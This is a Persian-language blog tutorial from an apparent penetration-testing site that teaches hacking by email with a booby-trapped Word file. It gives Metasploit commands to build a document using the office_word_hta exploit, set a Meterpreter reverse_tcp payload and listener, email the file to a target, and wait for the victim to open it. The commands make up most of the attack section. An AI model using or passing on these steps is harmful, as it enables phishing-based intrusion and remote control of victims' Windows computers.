هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت

هک با ایمیل

اموزش هک با ایمیل و ارسال فایل با فرمت .doc (ورد) در ادامه این اموزش جالب و کاربردی با ما همراه باشید

هک با ایمیل و فایل ضمیمه با پسوند .doc

یکی از راه های کلاینت هکینگ که بسیار انجام میشود ارسال ایمیل های الوده است که به روش های مختلفی استفاده میکنند برای مثال در اموزش های قبل در رابطه با فیشینگ و ارسال ایمیل به شما توضیح دادیم که نفوذگر با ارسال یک ایمیل فیشینگ یه بعضی اطلاعات شما میتواند دسترسی پیدا کند میتوانید با کمی جستجو اموزش ان را مشاهده کنید اما در این اموزش میخواهیم با ارسال یک فایل .doc از طریق ایمیل به تارگت دسترسی پیدا کنیم که تمامی راه نفوذ از طریق هک با ایمیل خواهد بود
 

ساخت پیلود با فرمت .doc

برای ساخت یک پیلود با فرمت .doc از متاسپلویت در کالی لینوکس استفاده میکنیم. ابتدا وارد محیط کالی لینوکس شده و متاسپلویت را اجرا کنید یا از طریق ترمینال دستور زیر را بزنید
نکته : این روش فقط مناسب برای هک سیستم عامل ویندوز است و بر روی سیستم عامل های دیگر جواب نخواهد داد ، میتوانید اموزش هک مک و هک لینوکس را مشاهده کنید

msfconsole

با دستور زیر در متاسپلویت وارد اکسپلویت مورد نظر شوید

use exploit/windows/fileformat/office_word_hta

برای مشاهده بخش های  از دستور زیر استفاده کنید

show options

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
حال ip و پورت خود را با دستورات زیر ست کنید

set SRVHOST 127.0.0.1

set RHOST 127.0.0.1

set LHOST 127.0.0.1

set LPORT 6060

set SRVPORT 6060

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
دستور exploit را زده تا فایل ورد ، برای ارسال و هک با ایمیل ایجاد شود ادرس و محل ذخیره ان نمایان میشود و کافیست فایل را برداشته و از طریق ایمیل ارسال کنید
برای کنترل و بازکردن پورت در سیستم خود از دستورات زیر استفاده کنید, پیلود مورد نظر را ست کنید

set payload windows/meterpreter/reverse_tcp

مجدد پورت و ip را دقیقا مانند دستور بالا ست کنید

set SRVHOST 127.0.0.1

….

سپس دستور زیر را بزنید و منتظر اجرا کردن فایل ورد توسط کلاینت شوید

exploit -j

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
امیدواریم از این اموزش لذت برده باشید

  دانلودر مناسب برای تست نفوذ کلاینت

پایدار باشید.

0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

داده کاوی

Data Mining (داده کاوی) چیست؟

در این اموزش با دیتا ماینینگ یا داده کاوی به صورت کامل اشنا خواهید شد با ما در ادامه این اموزش همراه باشید. 0/5 (0 نظر)   هک ایفون و راه های مقابله

ابزار SSLScan

ابزار SSLScan و برسی SSL وب سایت

در این آموزش به ابزار SSLScan جهت بررسی امنیتی SSL وب سایت ها می پردازیم، در ادامه در ادامه این آموزش با ما همراه باشید. 0/5 (0 نظر)   ابزار تست نفوذ به صورت اتوماتیک

اسکن سریع اسیب پذیری

اسکن سریع اسیب پذیری با CRLFuzz

در این آموزش با نحوه اسکن سریع اسیب پذیری ها با استفاده از ابزار CRLFuzz آشنا خواهید شد، با ما در ادامه این آموزش هک و امنیت همراه باشید. 0/5 (0 نظر)   پسورد هک شده خود را پیدا کنید !

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *